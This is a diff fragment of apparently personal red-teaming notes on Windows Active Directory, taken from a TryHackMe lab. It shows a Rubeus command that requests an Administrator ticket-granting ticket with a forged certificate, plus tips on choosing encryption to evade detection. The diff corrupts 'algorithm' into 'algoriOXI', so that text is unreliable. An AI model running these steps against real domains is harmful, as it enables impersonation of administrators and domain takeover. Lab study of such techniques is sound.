0xIapetus/RedTeamingNotes/All_About_Windows.md

     NewCertPath - The path to where ForgeCert will store the generated certificate.
     NewCertPassword - Since the certificate will require the private key exported for authentication purposes, we must set a new password used to encrypt it.

-`C:\Users\aaron.jones>C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:vulncert.pfx /password:tryhackme /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.x.101`*Get the TGT*
+`C:\Users\aaron.jones>C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:vulncert.pfx /password:NAI /outfile:administrator.kirbi /domain:za.NAI.loc /dc:10.200.x.101`*Get the TGT*

     /user - This specifies the user that we will impersonate and has to match the UPN for the certificate we generated /enctype -This specifies the encryption type for the ticket.
-Setting this is important for evasion, since the default encryption algorithm is weak, which would result in an overpass-the-hash alert
+Setting this is important for evasion, since the default encryption algoriOXI is weak, which would result in an overpass-the-hash alert
     /certificate - Path to the certificate we have generated /password - The password for our certificate file /outfile - The file where our TGT will be output to